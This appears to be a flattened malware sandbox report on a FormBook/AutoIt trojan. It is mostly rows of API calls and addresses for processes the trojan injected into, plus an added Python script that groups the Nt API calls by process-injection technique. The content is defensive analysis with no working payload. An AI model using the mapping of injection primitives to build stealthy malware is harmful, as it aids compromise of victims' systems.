Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035235C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035239B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522FA0 NtQuerySection
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03522CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03523010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03523090 NtSetValueKey
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03523D70 NtOpenThread
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03523D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02CA8B00 NtReadFile
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02CA8990 NtCreateFile
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02CA8E10 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02CA8CB0 NtClose
Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02CA8C00 NtDeleteFile
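Added example, not part of the Joe Sandbox report: the Nt* "Code function" rows above, fed as constructed input (in the page's flattened form) to a Python script that groups them by process and checks which combinations of primitives each process carries. It spells out four of the overview Signatures (foreign memory write, section mapping into another process, APC queueing, thread-context modification) as explicit API sets, records which Nt stubs the sandbox listed next to LdrInitializeThunk, and buckets stub addresses by 64 KB region so it is visible that both injected processes hold their Nt stubs in low address ranges (0x03C7xxxx in svchost.exe; 0x0352xxxx and a second table at 0x02CAxxxx in RpcPing.exe) rather than where the loaded 32-bit ntdll image would sit, which is the reading behind the report's direct/indirect syscall signature. The API sets and that address interpretation are my assumptions; the report itself only lists the functions.

```python
import re
from collections import defaultdict

# Constructed input: rows copied from the report above (same flattened form as the page).
SVC = r"Source: C:\Windows\SysWOW64\svchost.exeCode function: "
RPC = r"Source: C:\Windows\SysWOW64\RpcPing.exeCode function: "
ROWS = [
    SVC + "2_2_0042C223 NtClose,2_2_0042C223",
    SVC + "2_2_03C72B60 NtClose,LdrInitializeThunk,2_2_03C72B60",
    SVC + "2_2_03C74340 NtSetContextThread,2_2_03C74340",
    SVC + "2_2_03C72BF0 NtAllocateVirtualMemory,2_2_03C72BF0",
    SVC + "2_2_03C72FB0 NtResumeThread,2_2_03C72FB0",
    SVC + "2_2_03C72F30 NtCreateSection,2_2_03C72F30",
    SVC + "2_2_03C72EE0 NtQueueApcThread,2_2_03C72EE0",
    SVC + "2_2_03C72E30 NtWriteVirtualMemory,2_2_03C72E30",
    SVC + "2_2_03C72D10 NtMapViewOfSection,2_2_03C72D10",
    SVC + "2_2_03C72CF0 NtOpenProcess,2_2_03C72CF0",
    SVC + "2_2_03C739B0 NtGetContextThread,2_2_03C739B0",
    SVC + "2_2_03C73D70 NtOpenThread,2_2_03C73D70",
    RPC + "9_2_03524340 NtSetContextThread,LdrInitializeThunk,9_2_03524340",
    RPC + "9_2_03522BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03522BF0",
    RPC + "9_2_03522F30 NtCreateSection,LdrInitializeThunk,9_2_03522F30",
    RPC + "9_2_03522FB0 NtResumeThread,LdrInitializeThunk,9_2_03522FB0",
    RPC + "9_2_03522EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03522EE0",
    RPC + "9_2_03522D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03522D10",
    RPC + "9_2_035239B0 NtGetContextThread,LdrInitializeThunk,9_2_035239B0",
    RPC + "9_2_03522E30 NtWriteVirtualMemory,9_2_03522E30",
    RPC + "9_2_03522CF0 NtOpenProcess,9_2_03522CF0",
    RPC + "9_2_03523D70 NtOpenThread,9_2_03523D70",
    RPC + "9_2_02CA8C00 NtDeleteFile,9_2_02CA8C00",
]

# "<id> <api,api,...>,<id>": the trailing id is the row's own reference link.
ROW_RE = re.compile(
    r"^Source: (?P<path>.+?)Code function: "
    r"(?P<id>(?P<pid>\d+)_\d+_(?P<addr>[0-9A-F]{8})) (?P<apis>.+?),(?P=id)$"
)

# Assumption: my reading of the overview signatures as API sets, not Joe Sandbox's own logic.
INJECTION_PRIMITIVES = {
    "Writes to foreign memory regions": {"NtOpenProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory"},
    "Maps a DLL or memory area into another process": {"NtCreateSection", "NtMapViewOfSection"},
    "Queues an APC in another process (thread injection)": {"NtOpenThread", "NtQueueApcThread"},
    "Modifies the context of a thread in another process": {"NtGetContextThread", "NtSetContextThread", "NtResumeThread"},
}


def parse_rows(rows):
    """Group Nt stubs by (process index, image name); note stubs listed beside LdrInitializeThunk."""
    procs = defaultdict(lambda: {"stubs": defaultdict(list), "ldr_adjacent": set()})
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        key = (int(m["pid"]), m["path"].rsplit("\\", 1)[-1])
        apis = m["apis"].split(",")
        addr = int(m["addr"], 16)
        for api in apis:
            if api.startswith("Nt"):
                procs[key]["stubs"][api].append(addr)
                if "LdrInitializeThunk" in apis:
                    procs[key]["ldr_adjacent"].add(api)
    return procs


def assess(procs):
    """Per process: Nt APIs seen, injection techniques fully present, and the 64 KB regions holding stubs."""
    report = {}
    for key, info in procs.items():
        nt = set(info["stubs"])
        report[key] = {
            "nt_apis": sorted(nt),
            "techniques": [name for name, need in INJECTION_PRIMITIVES.items() if need <= nt],
            "ldr_adjacent": sorted(info["ldr_adjacent"]),
            "stub_regions": sorted({f"0x{a >> 16:04x}" for addrs in info["stubs"].values() for a in addrs}),
        }
    return report


if __name__ == "__main__":
    for key, rep in assess(parse_rows(ROWS)).items():
        print(key, rep["stub_regions"], rep["ldr_adjacent"])
        for t in rep["techniques"]:
            print("   ", t)
```

The stub_regions output is the part worth checking against the process list: 0x0042 in svchost.exe is the unpacked FormBook PE at 0x400000 that the Yara rule matched, while 0x03C7, 0x0352 and 0x02CA are separate tables of syscall stubs.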
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007B4021: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007A8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007B545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0075E800
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0077DBB5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0075E060
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007D804A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00764140
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00772405
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00786522
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0078267E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007D0665
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00766843
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0077283A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007889DF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00768A0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007D0AE2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00786A94
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007B8B13
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007AEB07
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0077CD61
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00787006
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0076710E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00763190
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00751287
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007733C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0077F419
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007716C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00765680
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007778D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007658C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00771BB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00789D05
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0075FE40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0077BFE6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00771FD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_036C3610
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402850
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410003
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042E823
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401250
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410223
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E29C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E2A3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403300
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402440
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416D0E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416D13
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004025F1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402600
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C64750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D00591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CEE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D0A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C32FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C82F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C60F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C52E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C58DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C8739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D2_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C02_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A02_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4B1B02_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7516C2_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F1722_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B16B2_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF0CC2_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C02_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF70E92_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF0E02_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF7B02_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C856302_2_03C85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D095C32_2_03D095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDD5B02_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF75712_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C314602_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF43F2_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB5BF02_2_03CB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7DBF92_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FB802_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFB762_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEDAC62_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDDAAC2_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C85AA02_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE1AA32_2_03CE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFA492_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7A462_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB3A6C2_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C499502_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B9502_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD59102_2_03CD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C438E02_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD8002_2_03CAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C03FD22_2_03C03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C03FD52_2_03C03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41F922_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFFB12_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFF092_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C49EB02_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FDC02_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43D402_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF1D5A2_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7D732_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFCF22_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB9C322_2_03CB9C32
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035AA352
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035B03E6
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034FE3F0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03590274
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035702C0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03578158
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0358A118
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034E0100
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035A81CC
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035B01AA
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035A41A2
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03582000
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03514750
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F0770
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034EC7C0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0350C6E0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F0535
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035B0591
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035A2446
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03594420
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0359E4F6
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035AAB40
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035A6BD7
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034EEA80
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03506962
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F29A0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035BA9A6
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F2840
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034FA840
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0351E8F0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034D68B8
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03564F40
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03510F30
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03592F30
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03532F28
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034E2FC8
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034FCFE0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0356EFA0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F0E59
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035AEE26
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035AEEDB
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03502E90
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035ACE93
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0358CD1F
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034FAD00
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034EADE0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03508DBF
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F0C00
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034E0CF2
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03590CB5
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034DD34C
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035A132D
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0353739A
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0350B2C0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035912ED
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F52A0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035BB16B
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0352516C
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034DF172
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034FB1B0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034F70C0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0359F0CC
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035A70E9
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035AF0E0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035AF7B0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03535630
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035A16CC
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035A7571
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035B95C3
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0358D5B0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_034E1460
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035AF43F
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035AFB76
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03565BF0
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0352DBF9
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0350FB80
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035AFA49
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_035A7A46
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_03563A6C
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_0359DAC6
